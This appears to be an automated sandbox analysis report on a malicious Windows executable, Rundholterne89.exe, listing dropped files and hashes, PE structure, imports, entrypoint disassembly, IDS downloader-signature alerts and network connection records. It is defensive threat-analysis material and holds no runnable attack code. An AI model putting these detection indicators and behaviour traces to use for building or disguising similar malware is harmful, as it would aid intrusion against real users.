SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Exungulate.Spe205
Download File
Process: | C:\Users\user\Desktop\Rundholterne89.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55452 |
Entropy (8bit): | 5.30644161671957 |
Encrypted: | false |
SSDEEP: | 1536:L3ZsYDoSFyAkhotYr3XpNhdrWlR7uDZy4k:DiYMSFyVoANpy4k |
MD5: | 0D2CE39822E9236A380F4D1D53550E93 |
SHA1: | 8381B0E62708112DBFBED036650BF0667EC4476B |
SHA-256: | ED34DB2A55A35C90B524D2448353EB73D28DA7D7FF401477165C226FF25DE9AF |
SHA-512: | F365BB861DB3FC6D29736B3F8C0377BB4F8318FFF94BC96033AE208760082B529B8AEA4CF79DE9EFA3608C79AC91FE57E19F26959831F621BBA8816E1013AFC3 |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\Rundholterne89.exe
Download File
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 891148 |
Entropy (8bit): | 7.7193229791674485 |
Encrypted: | false |
SSDEEP: | 24576:/75JHVcDo1hTW+VeQ9Ke+alCJmvulW6Nd0vd:jDHVUW/VrKe+m7mwMAd |
MD5: | A1E239C4D5116E289CE0597A92844EDE |
SHA1: | 4562D452CCC32512291C3165A0B9B3C076B28094 |
SHA-256: | 1E507FEBDD48A2BF2429C8011BD5CBC5C7B018207BDAEC87665B8B51FA13D904 |
SHA-512: | 500DDCDC2F1E3CA0DA0A43006B99C6E78697433FC0757D25DDFF94190DD2D725799FAF267EFDFACDEF758E9024591368454F14025662CC6A1309BCE7863494D2 |
Malicious: | true |
Antivirus: |
|
Preview: |
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\Rundholterne89.exe:Zone.Identifier
Download File
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 26 |
Entropy (8bit): | 3.95006375643621 |
Encrypted: | false |
SSDEEP: | 3:ggPYV:rPYV |
MD5: | 187F488E27DB4AF347237FE461A079AD |
SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\aktivitetsrunde.txt
Download File
Process: | C:\Users\user\Desktop\Rundholterne89.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 362 |
Entropy (8bit): | 4.295609901239941 |
Encrypted: | false |
SSDEEP: | 6:OV0mI/AA3CU6sDq6ry0bxmAOvFz0/TWEMsesxM7JXZO:OVcAV6yw3Ovx0/q3shK7Js |
MD5: | A47DE65B255D62E154E75208730B37D2 |
SHA1: | 9AD95C489EABDBCD12C02CD312C85D0C73A565F7 |
SHA-256: | 1527C27BE377FB2EFDB75E64EF88FEE6B879712DEC1AE6E8CCA4E66188099784 |
SHA-512: | 206FB780CA6A6BEA7B1DA2AAD8D1E8C38331AE5A03CC82FC181A6E13234DC4523033AA775A3F15C261FEC74910ECAF622ABAC99444E8DAA8B63EC35379FBE29A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\discourteously.gam
Download File
Process: | C:\Users\user\Desktop\Rundholterne89.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 339224 |
Entropy (8bit): | 3.2329059465811363 |
Encrypted: | false |
SSDEEP: | 3072:TlwUufGWwltoSeWq5Xck5tiy5ScV95Cca+8aB5p0jsDytfuWoaP/ZTf:x3W045X/5tiyB8faB5p4sD22uN |
MD5: | 2AFAF6367CF5833A8885999FEFA5B44A |
SHA1: | 58EDFAC56FD3BDA98CAD7F2A784F58CF0CCCA5A9 |
SHA-256: | 66D0440913A064549BF52DD102475A422A55A0A1A99A38C0445CCF84EB98C074 |
SHA-512: | A769F552CD91CE7163FE25C6E785D3A225979A9E50805F031C05E52CF5F82FB1E582FE621C947C7B0709F9E627C6CF318CF899CA97CC2BC4A3D934B94C2279A4 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\psychograph.rut
Download File
Process: | C:\Users\user\Desktop\Rundholterne89.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 91155 |
Entropy (8bit): | 3.2484639775571122 |
Encrypted: | false |
SSDEEP: | 768:sx0eYUpSjZTH4Refp/ZwLfKCGhiKveAC4LjJNV8RHwnx/F0H0jbPYER9RLXLxFJi:8UhyD9meQZFRRbLXdDRseVQq4 |
MD5: | 55DD84338306B8F361571D07E3D03F25 |
SHA1: | 5F086147B0ED6D4CBE40B6F81C1003EB07714B94 |
SHA-256: | 016DE5BD5CEBA70CD0041265F69BE3BB6FF54D3DCA19340ED44DC15317066E45 |
SHA-512: | 045E39931094C1D423D69C4BEF750CACF56E0DEF562162211F51F1B5E0C3E265ACEDE7FC06979CFCE68762A99180317419685E5542D3E44882B11116D1EE7FE8 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\strudsfjerenes.uns
Download File
Process: | C:\Users\user\Desktop\Rundholterne89.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 411197 |
Entropy (8bit): | 3.2412073600303604 |
Encrypted: | false |
SSDEEP: | 6144:QuopzWTN5dkmo9X81LoYHLr0FJfFYcRQOD:KkxkfDEC |
MD5: | 9548F6F7A71852794789DE0AC5FDE451 |
SHA1: | 74C915E2C9C110929FD87C907BE17930B0B66B24 |
SHA-256: | 2D3371072047972236B2BAD7280E34BA1FD041C99CD132BC0E1DD767D0AFC471 |
SHA-512: | 0468FCA29C3F916CBC0B3B132EA24BB582ED0F0D4921523F5DF6EE17F76709437D25324E08AF3C43FCAE8BD1B9F388E49B64ED3C8464062E7D099B0D6B9BC5DE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\unnamed.jpg
Download File
Process: | C:\Users\user\Desktop\Rundholterne89.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15845 |
Entropy (8bit): | 7.693658939604953 |
Encrypted: | false |
SSDEEP: | 384:dnSPb8riksvdEh0qrjVqIPrLgrpNQMUBWud20p:dnUwriksvMjrZqo3Up9U8ud20p |
MD5: | 762778DFE1B62D3430B44A32AEDC03E0 |
SHA1: | 7317D9579F9F4C4BEF82BE64FB3DFFB63160EEC5 |
SHA-256: | 9A602EBAFC1F46AAD7248F6DA82938CE382DE9FFBC6C472BD4848D4519CA67A8 |
SHA-512: | B39A8F6DC07F3A4CFE3CF5E1563543ECE2864FECED28282356FA64D7D0B50FA43B70F57FC8A2C4424A553E14E6BE526293D90F56C63994EC79F5520488EE0CCF |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Sekundrlitteraturers.Non
Download File
Process: | C:\Users\user\Desktop\Rundholterne89.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 340868 |
Entropy (8bit): | 7.658610751329724 |
Encrypted: | false |
SSDEEP: | 6144:HP+VoRJRmCwM6PiJ5JsAPmxI26uHwKZUu36NbST5CFgX29:UoR/m9PiJ5Js5xhFwKZMNy0gG9 |
MD5: | D3086578D45D821207EAC6CBB8E24A2B |
SHA1: | 0772CBCE5403EDAE1AAB6310B2F58D7F99C726C0 |
SHA-256: | E856FC4F6B157E7799C1AF872064CD1BE9F982B1A5D18D7B16E5C3A48E3A1B1A |
SHA-512: | 7DB853BECC19B209C0534C8F09635C55DAB9BC540BD138054C2E84BBFC396BFA587BD4549A7188824F95271C04894BB7C66795F75267BCA16620BC27ED38807D |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.7193229791674485 |
TrID: |
|
File name: | Rundholterne89.exe |
File size: | 891'148 bytes |
MD5: | a1e239c4d5116e289ce0597a92844ede |
SHA1: | 4562d452ccc32512291c3165a0b9b3c076b28094 |
SHA256: | 1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904 |
SHA512: | 500ddcdc2f1e3ca0da0a43006b99c6e78697433fc0757d25ddff94190dd2d725799faf267efdfacdef758e9024591368454f14025662cc6a1309bce7863494d2 |
SSDEEP: | 24576:/75JHVcDo1hTW+VeQ9Ke+alCJmvulW6Nd0vd:jDHVUW/VrKe+m7mwMAd |
TLSH: | 8C152286F764DDB7E831527010BEA932E1716C728161920737A97F7A883373E0D4B6CA |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L....{.W.................`...|..... |
Icon Hash: | 4ccc524656d64e01 |
Entrypoint: | 0x40310f |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x57807BD9 [Sat Jul 9 04:21:45 2016 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | b78ecf47c0a3e24a6f4af114e2d1f5de |
Instruction |
---|
sub esp, 00000184h |
push ebx |
push esi |
push edi |
xor ebx, ebx |
push 00008001h |
mov dword ptr [esp+18h], ebx |
mov dword ptr [esp+10h], 00409198h |
mov dword ptr [esp+20h], ebx |
mov byte ptr [esp+14h], 00000020h |
call dword ptr [004070A8h] |
call dword ptr [004070A4h] |
cmp ax, 00000006h |
je 00007F880CDD9FD3h |
push ebx |
call 00007F880CDDCF41h |
cmp eax, ebx |
je 00007F880CDD9FC9h |
push 00000C00h |
call eax |
mov esi, 00407298h |
push esi |
call 00007F880CDDCEBDh |
push esi |
call dword ptr [004070A0h] |
lea esi, dword ptr [esi+eax+01h] |
cmp byte ptr [esi], bl |
jne 00007F880CDD9FADh |
push ebp |
push 00000009h |
call 00007F880CDDCF14h |
push 00000007h |
call 00007F880CDDCF0Dh |
mov dword ptr [0042E404h], eax |
call dword ptr [00407044h] |
push ebx |
call dword ptr [00407288h] |
mov dword ptr [0042E4B8h], eax |
push ebx |
lea eax, dword ptr [esp+38h] |
push 00000160h |
push eax |
push ebx |
push 00428828h |
call dword ptr [00407174h] |
push 00409188h |
push 0042DC00h |
call 00007F880CDDCB37h |
call dword ptr [0040709Ch] |
mov ebp, 00434000h |
push eax |
push ebp |
call 00007F880CDDCB25h |
push ebx |
call dword ptr [00407154h] |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7534 | 0xa0 | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x42000 | 0x1aa58 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x298 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x5fdd | 0x6000 | 38462d04cfdbc4943d18be461d53cc3e | False | 0.6783854166666666 | data | 6.499697507009752 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x7000 | 0x1352 | 0x1400 | 3d134ae5961af9895950a7ee0adc520a | False | 0.4583984375 | data | 5.207538993430304 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0x9000 | 0x254f8 | 0x600 | 2d00401e0c64d69b6d0ccb877d9f624e | False | 0.4544270833333333 | data | 4.0323505938358934 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.ndata | 0x2f000 | 0x13000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0x42000 | 0x1aa58 | 0x1ac00 | 098718c0c5bf54afe6e125c2f1ac35ba | False | 0.23448452102803738 | data | 3.706045365348602 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_BITMAP | 0x42460 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States | 0.23623853211009174 |
RT_ICON | 0x427c8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | English | United States | 0.09021944871643203 |
RT_ICON | 0x52ff0 | 0x32f2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9443336911516639 |
RT_ICON | 0x562e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.16089211618257263 |
RT_ICON | 0x58890 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.18738273921200752 |
RT_ICON | 0x59938 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | United States | 0.31050106609808104 |
RT_ICON | 0x5a7e0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | United States | 0.440884476534296 |
RT_ICON | 0x5b088 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | United States | 0.5635838150289018 |
RT_ICON | 0x5b5f0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.2703900709219858 |
RT_ICON | 0x5ba58 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | United States | 0.21908602150537634 |
RT_ICON | 0x5bd40 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | United States | 0.3716216216216216 |
RT_DIALOG | 0x5be68 | 0x144 | data | English | United States | 0.5216049382716049 |
RT_DIALOG | 0x5bfb0 | 0x13c | data | English | United States | 0.5506329113924051 |
RT_DIALOG | 0x5c0f0 | 0x100 | data | English | United States | 0.5234375 |
RT_DIALOG | 0x5c1f0 | 0x11c | data | English | United States | 0.6056338028169014 |
RT_DIALOG | 0x5c310 | 0xc4 | data | English | United States | 0.5918367346938775 |
RT_DIALOG | 0x5c3d8 | 0x60 | data | English | United States | 0.7291666666666666 |
RT_GROUP_ICON | 0x5c438 | 0x92 | data | English | United States | 0.6575342465753424 |
RT_VERSION | 0x5c4d0 | 0x248 | data | English | United States | 0.5308219178082192 |
RT_MANIFEST | 0x5c718 | 0x340 | XML 1.0 document, ASCII text, with very long lines (832), with no line terminators | English | United States | 0.5540865384615384 |
DLL | Import |
---|---|
KERNEL32.dll | SetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc |
USER32.dll | ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA |
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA |
ADVAPI32.dll | RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA |
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy |
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-10-22T16:04:14.198153+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.10 | 49709 | 142.250.185.174 | 443 | TCP |
2024-10-22T16:04:19.358399+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49711 | 193.122.130.0 | 80 | TCP |
2024-10-22T16:04:20.811576+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49711 | 193.122.130.0 | 80 | TCP |
2024-10-22T16:04:21.520222+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.10 | 49713 | 188.114.97.3 | 443 | TCP |
2024-10-22T16:04:22.249021+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49714 | 193.122.130.0 | 80 | TCP |
2024-10-22T16:04:22.954475+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.10 | 49715 | 188.114.97.3 | 443 | TCP |
2024-10-22T16:04:26.027860+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.10 | 49719 | 188.114.97.3 | 443 | TCP |
2024-10-22T16:04:28.905367+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.10 | 49723 | 188.114.97.3 | 443 | TCP |
2024-10-22T16:04:31.792925+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.10 | 49727 | 188.114.97.3 | 443 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Oct 22, 2024 16:04:12.902620077 CEST | 49709 | 443 | 192.168.2.10 | 142.250.185.174 |
Oct 22, 2024 16:04:12.902672052 CEST | 443 | 49709 | 142.250.185.174 | 192.168.2.10 |
Oct 22, 2024 16:04:12.902757883 CEST | 49709 | 443 | 192.168.2.10 | 142.250.185.174 |
Oct 22, 2024 16:04:12.913573980 CEST | 49709 | 443 | 192.168.2.10 | 142.250.185.174 |
Oct 22, 2024 16:04:12.913589001 CEST | 443 | 49709 | 142.250.185.174 | 192.168.2.10 |
Oct 22, 2024 16:04:13.773917913 CEST | 443 | 49709 | 142.250.185.174 | 192.168.2.10 |
Oct 22, 2024 16:04:13.773994923 CEST | 49709 | 443 | 192.168.2.10 | 142.250.185.174 |
Oct 22, 2024 16:04:13.775017977 CEST | 443 | 49709 | 142.250.185.174 | 192.168.2.10 |
Oct 22, 2024 16:04:13.775080919 CEST | 49709 | 443 | 192.168.2.10 | 142.250.185.174 |
Oct 22, 2024 16:04:13.827322006 CEST | 49709 | 443 | 192.168.2.10 | 142.250.185.174 |
Oct 22, 2024 16:04:13.827351093 CEST | 443 | 49709 | 142.250.185.174 | 192.168.2.10 |
Oct 22, 2024 16:04:13.827816963 CEST | 443 | 49709 | 142.250.185.174 | 192.168.2.10 |
Oct 22, 2024 16:04:13.827873945 CEST | 49709 | 443 | 192.168.2.10 | 142.250.185.174 |
Oct 22, 2024 16:04:13.829560995 CEST | 49709 | 443 | 192.168.2.10 | 142.250.185.174 |
Oct 22, 2024 16:04:13.871364117 CEST | 443 | 49709 | 142.250.185.174 | 192.168.2.10 |
Oct 22, 2024 16:04:14.198174953 CEST | 443 | 49709 | 142.250.185.174 | 192.168.2.10 |
Oct 22, 2024 16:04:14.198261023 CEST | 49709 | 443 | 192.168.2.10 | 142.250.185.174 |
Oct 22, 2024 16:04:14.198398113 CEST | 49709 | 443 | 192.168.2.10 | 142.250.185.174 |
Oct 22, 2024 16:04:14.198436022 CEST | 443 | 49709 | 142.250.185.174 | 192.168.2.10 |
Oct 22, 2024 16:04:14.198479891 CEST | 49709 | 443 | 192.168.2.10 | 142.250.185.174 |
Oct 22, 2024 16:04:14.232996941 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:14.233042955 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:14.233189106 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:14.233568907 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:14.233589888 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:15.098956108 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:15.099041939 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:15.103468895 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:15.103483915 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:15.103863001 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:15.103916883 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:15.104291916 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:15.151323080 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.693398952 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.693504095 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.702198982 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.702264071 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.811713934 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.811849117 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.811996937 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.812033892 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.812089920 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.812112093 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.812195063 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.812201023 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.812287092 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.816566944 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.816629887 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.816637993 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.816679001 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.825105906 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.825174093 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.825182915 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.825227976 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.833801985 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.833874941 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.833884001 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.833924055 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
Oct 22, 2024 16:04:17.842605114 CEST | 443 | 49710 | 142.250.186.65 | 192.168.2.10 |
Oct 22, 2024 16:04:17.842669964 CEST | 49710 | 443 | 192.168.2.10 | 142.250.186.65 |
